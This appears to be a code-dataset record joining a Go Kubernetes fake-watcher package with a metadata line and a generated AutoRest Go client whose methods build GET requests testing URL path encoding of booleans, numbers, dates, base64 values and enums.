import (
"fmt"
"sync"
"k8s.io/klog"
"k8s.io/apimachinery/pkg/runtime"
)
type Interface interface {
Stop()
ResultChan() <-chan Event
}
type EventType string
const (
Added EventType = "ADDED"
Modified EventType = "MODIFIED"
Deleted EventType = "DELETED"
Bookmark EventType = "BOOKMARK"
Error EventType = "ERROR"
DefaultChanSize int32 = 100
)
type Event struct {
Type EventType
Object runtime.Object
}
type emptyWatch chan Event
func NewEmptyWatch() Interface {
ch := make(chan Event)
close(ch)
return emptyWatch(ch)
}
func (w emptyWatch) Stop() {
}
func (w emptyWatch) ResultChan() <-chan Event {
return chan Event(w)
}
type FakeWatcher struct {
result chan Event
Stopped bool
sync.Mutex
}
func NewFake() *FakeWatcher {
return &FakeWatcher{
result: make(chan Event),
}
}
func NewFakeWithChanSize(size int, blocking bool) *FakeWatcher {
return &FakeWatcher{
result: make(chan Event, size),
}
}
func (f *FakeWatcher) Stop() {
f.Lock()
defer f.Unlock()
if !f.Stopped {
klog.V(4).Infof("Stopping fake watcher.")
close(f.result)
f.Stopped = true
}
}
func (f *FakeWatcher) IsStopped() bool {
f.Lock()
defer f.Unlock()
return f.Stopped
}
func (f *FakeWatcher) Reset() {
f.Lock()
defer f.Unlock()
f.Stopped = false
f.result = make(chan Event)
}
func (f *FakeWatcher) ResultChan() <-chan Event {
return f.result
}
func (f *FakeWatcher) Add(obj runtime.Object) {
f.result <- Event{Added, obj}
}
func (f *FakeWatcher) Modify(obj runtime.Object) {
f.result <- Event{Modified, obj}
}
func (f *FakeWatcher) Delete(lastValue runtime.Object) {
f.result <- Event{Deleted, lastValue}
}
func (f *FakeWatcher) Error(errValue runtime.Object) {
f.result <- Event{Error, errValue}
}
func (f *FakeWatcher) Action(action EventType, obj runtime.Object) {
f.result <- Event{action, obj}
}
type RaceFreeFakeWatcher struct {
result chan Event
Stopped bool
sync.Mutex
}
func NewRaceFreeFake() *RaceFreeFakeWatcher {
return &RaceFreeFakeWatcher{
result: make(chan Event, DefaultChanSize),
}
}
func (f *RaceFreeFakeWatcher) Stop() {
f.Lock()
defer f.Unlock()
if !f.Stopped {
klog.V(4).Infof("Stopping fake watcher.")
close(f.result)
f.Stopped = true
}
}
func (f *RaceFreeFakeWatcher) IsStopped() bool {
f.Lock()
defer f.Unlock()
return f.Stopped
}
func (f *RaceFreeFakeWatcher) Reset() {
f.Lock()
defer f.Unlock()
f.Stopped = false
f.result = make(chan Event, DefaultChanSize)
}
func (f *RaceFreeFakeWatcher) ResultChan() <-chan Event {
f.Lock()
defer f.Unlock()
return f.result
}
func (f *RaceFreeFakeWatcher) Add(obj runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Added, obj}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
}
func (f *RaceFreeFakeWatcher) Modify(obj runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Modified, obj}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
}
func (f *RaceFreeFakeWatcher) Delete(lastValue runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Deleted, lastValue}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
} | Apache License 2.0 |
azure/autorest.go | test/autorest/urlgroup/zz_generated_paths_client.go | getIntOneMillionCreateRequest | go | func (client *PathsClient) getIntOneMillionCreateRequest(ctx context.Context, options *PathsGetIntOneMillionOptions) (*policy.Request, error) {
urlPath := "/paths/int/1000000/{intPath}"
urlPath = strings.ReplaceAll(urlPath, "{intPath}", url.PathEscape("1000000"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
} | getIntOneMillionCreateRequest creates the GetIntOneMillion request. | https://github.com/azure/autorest.go/blob/01cdd9c890252a9ef822f6d3f2e1273ff9e99cb6/test/autorest/urlgroup/zz_generated_paths_client.go#L815-L824 | package urlgroup
import (
"context"
"encoding/base64"
"errors"
"fmt"
"github.com/Azure/azure-sdk-for-go/sdk/azcore/policy"
"github.com/Azure/azure-sdk-for-go/sdk/azcore/runtime"
"net/http"
"net/url"
"strings"
"time"
)
type PathsClient struct {
con *Connection
}
func NewPathsClient(con *Connection) *PathsClient {
return &PathsClient{con: con}
}
func (client *PathsClient) ArrayCSVInPath(ctx context.Context, arrayPath []string, options *PathsArrayCSVInPathOptions) (PathsArrayCSVInPathResponse, error) {
req, err := client.arrayCSVInPathCreateRequest(ctx, arrayPath, options)
if err != nil {
return PathsArrayCSVInPathResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsArrayCSVInPathResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsArrayCSVInPathResponse{}, client.arrayCSVInPathHandleError(resp)
}
return PathsArrayCSVInPathResponse{RawResponse: resp}, nil
}
func (client *PathsClient) arrayCSVInPathCreateRequest(ctx context.Context, arrayPath []string, options *PathsArrayCSVInPathOptions) (*policy.Request, error) {
urlPath := "/paths/array/ArrayPath1%2cbegin%21%2A%27%28%29%3B%3A%40%20%26%3D%2B%24%2C%2F%3F%23%5B%5Dend%2c%2c/{arrayPath}"
urlPath = strings.ReplaceAll(urlPath, "{arrayPath}", url.PathEscape(strings.Join(arrayPath, ",")))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) arrayCSVInPathHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) Base64URL(ctx context.Context, base64URLPath []byte, options *PathsBase64URLOptions) (PathsBase64URLResponse, error) {
req, err := client.base64URLCreateRequest(ctx, base64URLPath, options)
if err != nil {
return PathsBase64URLResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsBase64URLResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsBase64URLResponse{}, client.base64URLHandleError(resp)
}
return PathsBase64URLResponse{RawResponse: resp}, nil
}
func (client *PathsClient) base64URLCreateRequest(ctx context.Context, base64URLPath []byte, options *PathsBase64URLOptions) (*policy.Request, error) {
urlPath := "/paths/string/bG9yZW0/{base64UrlPath}"
urlPath = strings.ReplaceAll(urlPath, "{base64UrlPath}", url.PathEscape(base64.RawURLEncoding.EncodeToString(base64URLPath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) base64URLHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) ByteEmpty(ctx context.Context, options *PathsByteEmptyOptions) (PathsByteEmptyResponse, error) {
req, err := client.byteEmptyCreateRequest(ctx, options)
if err != nil {
return PathsByteEmptyResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsByteEmptyResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsByteEmptyResponse{}, client.byteEmptyHandleError(resp)
}
return PathsByteEmptyResponse{RawResponse: resp}, nil
}
func (client *PathsClient) byteEmptyCreateRequest(ctx context.Context, options *PathsByteEmptyOptions) (*policy.Request, error) {
urlPath := "/paths/byte/empty/{bytePath}"
urlPath = strings.ReplaceAll(urlPath, "{bytePath}", url.PathEscape(""))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) byteEmptyHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) ByteMultiByte(ctx context.Context, bytePath []byte, options *PathsByteMultiByteOptions) (PathsByteMultiByteResponse, error) {
req, err := client.byteMultiByteCreateRequest(ctx, bytePath, options)
if err != nil {
return PathsByteMultiByteResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsByteMultiByteResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsByteMultiByteResponse{}, client.byteMultiByteHandleError(resp)
}
return PathsByteMultiByteResponse{RawResponse: resp}, nil
}
func (client *PathsClient) byteMultiByteCreateRequest(ctx context.Context, bytePath []byte, options *PathsByteMultiByteOptions) (*policy.Request, error) {
urlPath := "/paths/byte/multibyte/{bytePath}"
urlPath = strings.ReplaceAll(urlPath, "{bytePath}", url.PathEscape(base64.StdEncoding.EncodeToString(bytePath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) byteMultiByteHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) ByteNull(ctx context.Context, bytePath []byte, options *PathsByteNullOptions) (PathsByteNullResponse, error) {
req, err := client.byteNullCreateRequest(ctx, bytePath, options)
if err != nil {
return PathsByteNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsByteNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsByteNullResponse{}, client.byteNullHandleError(resp)
}
return PathsByteNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) byteNullCreateRequest(ctx context.Context, bytePath []byte, options *PathsByteNullOptions) (*policy.Request, error) {
urlPath := "/paths/byte/null/{bytePath}"
urlPath = strings.ReplaceAll(urlPath, "{bytePath}", url.PathEscape(base64.StdEncoding.EncodeToString(bytePath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) byteNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateNull(ctx context.Context, datePath time.Time, options *PathsDateNullOptions) (PathsDateNullResponse, error) {
req, err := client.dateNullCreateRequest(ctx, datePath, options)
if err != nil {
return PathsDateNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsDateNullResponse{}, client.dateNullHandleError(resp)
}
return PathsDateNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateNullCreateRequest(ctx context.Context, datePath time.Time, options *PathsDateNullOptions) (*policy.Request, error) {
urlPath := "/paths/date/null/{datePath}"
urlPath = strings.ReplaceAll(urlPath, "{datePath}", url.PathEscape(datePath.Format("2006-01-02")))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateTimeNull(ctx context.Context, dateTimePath time.Time, options *PathsDateTimeNullOptions) (PathsDateTimeNullResponse, error) {
req, err := client.dateTimeNullCreateRequest(ctx, dateTimePath, options)
if err != nil {
return PathsDateTimeNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateTimeNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsDateTimeNullResponse{}, client.dateTimeNullHandleError(resp)
}
return PathsDateTimeNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateTimeNullCreateRequest(ctx context.Context, dateTimePath time.Time, options *PathsDateTimeNullOptions) (*policy.Request, error) {
urlPath := "/paths/datetime/null/{dateTimePath}"
urlPath = strings.ReplaceAll(urlPath, "{dateTimePath}", url.PathEscape(dateTimePath.Format(time.RFC3339Nano)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateTimeNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateTimeValid(ctx context.Context, options *PathsDateTimeValidOptions) (PathsDateTimeValidResponse, error) {
req, err := client.dateTimeValidCreateRequest(ctx, options)
if err != nil {
return PathsDateTimeValidResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateTimeValidResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDateTimeValidResponse{}, client.dateTimeValidHandleError(resp)
}
return PathsDateTimeValidResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateTimeValidCreateRequest(ctx context.Context, options *PathsDateTimeValidOptions) (*policy.Request, error) {
urlPath := "/paths/datetime/2012-01-01T01%3A01%3A01Z/{dateTimePath}"
urlPath = strings.ReplaceAll(urlPath, "{dateTimePath}", url.PathEscape("2012-01-01T01:01:01Z"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateTimeValidHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DateValid(ctx context.Context, options *PathsDateValidOptions) (PathsDateValidResponse, error) {
req, err := client.dateValidCreateRequest(ctx, options)
if err != nil {
return PathsDateValidResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDateValidResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDateValidResponse{}, client.dateValidHandleError(resp)
}
return PathsDateValidResponse{RawResponse: resp}, nil
}
func (client *PathsClient) dateValidCreateRequest(ctx context.Context, options *PathsDateValidOptions) (*policy.Request, error) {
urlPath := "/paths/date/2012-01-01/{datePath}"
urlPath = strings.ReplaceAll(urlPath, "{datePath}", url.PathEscape("2012-01-01"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) dateValidHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DoubleDecimalNegative(ctx context.Context, options *PathsDoubleDecimalNegativeOptions) (PathsDoubleDecimalNegativeResponse, error) {
req, err := client.doubleDecimalNegativeCreateRequest(ctx, options)
if err != nil {
return PathsDoubleDecimalNegativeResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDoubleDecimalNegativeResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDoubleDecimalNegativeResponse{}, client.doubleDecimalNegativeHandleError(resp)
}
return PathsDoubleDecimalNegativeResponse{RawResponse: resp}, nil
}
func (client *PathsClient) doubleDecimalNegativeCreateRequest(ctx context.Context, options *PathsDoubleDecimalNegativeOptions) (*policy.Request, error) {
urlPath := "/paths/double/-9999999.999/{doublePath}"
urlPath = strings.ReplaceAll(urlPath, "{doublePath}", url.PathEscape("-9999999.999"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) doubleDecimalNegativeHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) DoubleDecimalPositive(ctx context.Context, options *PathsDoubleDecimalPositiveOptions) (PathsDoubleDecimalPositiveResponse, error) {
req, err := client.doubleDecimalPositiveCreateRequest(ctx, options)
if err != nil {
return PathsDoubleDecimalPositiveResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsDoubleDecimalPositiveResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsDoubleDecimalPositiveResponse{}, client.doubleDecimalPositiveHandleError(resp)
}
return PathsDoubleDecimalPositiveResponse{RawResponse: resp}, nil
}
func (client *PathsClient) doubleDecimalPositiveCreateRequest(ctx context.Context, options *PathsDoubleDecimalPositiveOptions) (*policy.Request, error) {
urlPath := "/paths/double/9999999.999/{doublePath}"
urlPath = strings.ReplaceAll(urlPath, "{doublePath}", url.PathEscape("9999999.999"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) doubleDecimalPositiveHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) EnumNull(ctx context.Context, enumPath URIColor, options *PathsEnumNullOptions) (PathsEnumNullResponse, error) {
req, err := client.enumNullCreateRequest(ctx, enumPath, options)
if err != nil {
return PathsEnumNullResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsEnumNullResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusBadRequest) {
return PathsEnumNullResponse{}, client.enumNullHandleError(resp)
}
return PathsEnumNullResponse{RawResponse: resp}, nil
}
func (client *PathsClient) enumNullCreateRequest(ctx context.Context, enumPath URIColor, options *PathsEnumNullOptions) (*policy.Request, error) {
urlPath := "/paths/string/null/{enumPath}"
if enumPath == "" {
return nil, errors.New("parameter enumPath cannot be empty")
}
urlPath = strings.ReplaceAll(urlPath, "{enumPath}", url.PathEscape(string(enumPath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) enumNullHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) EnumValid(ctx context.Context, enumPath URIColor, options *PathsEnumValidOptions) (PathsEnumValidResponse, error) {
req, err := client.enumValidCreateRequest(ctx, enumPath, options)
if err != nil {
return PathsEnumValidResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsEnumValidResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsEnumValidResponse{}, client.enumValidHandleError(resp)
}
return PathsEnumValidResponse{RawResponse: resp}, nil
}
func (client *PathsClient) enumValidCreateRequest(ctx context.Context, enumPath URIColor, options *PathsEnumValidOptions) (*policy.Request, error) {
urlPath := "/paths/enum/green%20color/{enumPath}"
if enumPath == "" {
return nil, errors.New("parameter enumPath cannot be empty")
}
urlPath = strings.ReplaceAll(urlPath, "{enumPath}", url.PathEscape(string(enumPath)))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) enumValidHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) FloatScientificNegative(ctx context.Context, options *PathsFloatScientificNegativeOptions) (PathsFloatScientificNegativeResponse, error) {
req, err := client.floatScientificNegativeCreateRequest(ctx, options)
if err != nil {
return PathsFloatScientificNegativeResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsFloatScientificNegativeResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsFloatScientificNegativeResponse{}, client.floatScientificNegativeHandleError(resp)
}
return PathsFloatScientificNegativeResponse{RawResponse: resp}, nil
}
func (client *PathsClient) floatScientificNegativeCreateRequest(ctx context.Context, options *PathsFloatScientificNegativeOptions) (*policy.Request, error) {
urlPath := "/paths/float/-1.034E-20/{floatPath}"
urlPath = strings.ReplaceAll(urlPath, "{floatPath}", url.PathEscape("-1.034e-20"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) floatScientificNegativeHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) FloatScientificPositive(ctx context.Context, options *PathsFloatScientificPositiveOptions) (PathsFloatScientificPositiveResponse, error) {
req, err := client.floatScientificPositiveCreateRequest(ctx, options)
if err != nil {
return PathsFloatScientificPositiveResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsFloatScientificPositiveResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsFloatScientificPositiveResponse{}, client.floatScientificPositiveHandleError(resp)
}
return PathsFloatScientificPositiveResponse{RawResponse: resp}, nil
}
func (client *PathsClient) floatScientificPositiveCreateRequest(ctx context.Context, options *PathsFloatScientificPositiveOptions) (*policy.Request, error) {
urlPath := "/paths/float/1.034E+20/{floatPath}"
urlPath = strings.ReplaceAll(urlPath, "{floatPath}", url.PathEscape("103400000000000000000"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) floatScientificPositiveHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetBooleanFalse(ctx context.Context, options *PathsGetBooleanFalseOptions) (PathsGetBooleanFalseResponse, error) {
req, err := client.getBooleanFalseCreateRequest(ctx, options)
if err != nil {
return PathsGetBooleanFalseResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetBooleanFalseResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetBooleanFalseResponse{}, client.getBooleanFalseHandleError(resp)
}
return PathsGetBooleanFalseResponse{RawResponse: resp}, nil
}
func (client *PathsClient) getBooleanFalseCreateRequest(ctx context.Context, options *PathsGetBooleanFalseOptions) (*policy.Request, error) {
urlPath := "/paths/bool/false/{boolPath}"
urlPath = strings.ReplaceAll(urlPath, "{boolPath}", url.PathEscape("false"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) getBooleanFalseHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetBooleanTrue(ctx context.Context, options *PathsGetBooleanTrueOptions) (PathsGetBooleanTrueResponse, error) {
req, err := client.getBooleanTrueCreateRequest(ctx, options)
if err != nil {
return PathsGetBooleanTrueResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetBooleanTrueResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetBooleanTrueResponse{}, client.getBooleanTrueHandleError(resp)
}
return PathsGetBooleanTrueResponse{RawResponse: resp}, nil
}
func (client *PathsClient) getBooleanTrueCreateRequest(ctx context.Context, options *PathsGetBooleanTrueOptions) (*policy.Request, error) {
urlPath := "/paths/bool/true/{boolPath}"
urlPath = strings.ReplaceAll(urlPath, "{boolPath}", url.PathEscape("true"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) getBooleanTrueHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetIntNegativeOneMillion(ctx context.Context, options *PathsGetIntNegativeOneMillionOptions) (PathsGetIntNegativeOneMillionResponse, error) {
req, err := client.getIntNegativeOneMillionCreateRequest(ctx, options)
if err != nil {
return PathsGetIntNegativeOneMillionResponse{}, err
}
resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetIntNegativeOneMillionResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetIntNegativeOneMillionResponse{}, client.getIntNegativeOneMillionHandleError(resp)
}
return PathsGetIntNegativeOneMillionResponse{RawResponse: resp}, nil
}
func (client *PathsClient) getIntNegativeOneMillionCreateRequest(ctx context.Context, options *PathsGetIntNegativeOneMillionOptions) (*policy.Request, error) {
urlPath := "/paths/int/-1000000/{intPath}"
urlPath = strings.ReplaceAll(urlPath, "{intPath}", url.PathEscape("-1000000"))
req, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.con.Endpoint(), urlPath))
if err != nil {
return nil, err
}
req.Raw().Header.Set("Accept", "application/json")
return req, nil
}
func (client *PathsClient) getIntNegativeOneMillionHandleError(resp *http.Response) error {
body, err := runtime.Payload(resp)
if err != nil {
return runtime.NewResponseError(err, resp)
}
errType := Error{raw: string(body)}
if err := runtime.UnmarshalAsJSON(resp, &errType); err != nil {
return runtime.NewResponseError(fmt.Errorf("%s\n%s", string(body), err), resp)
}
return runtime.NewResponseError(&errType, resp)
}
func (client *PathsClient) GetIntOneMillion(ctx context.Context, options *PathsGetIntOneMillionOptions) (PathsGetIntOneMillionResponse, error) {
req, err := client.getIntOneMillionCreateRequest(ctx, options)
if err != nil {
return PathsGetIntOneMillionResponse{}, err
}
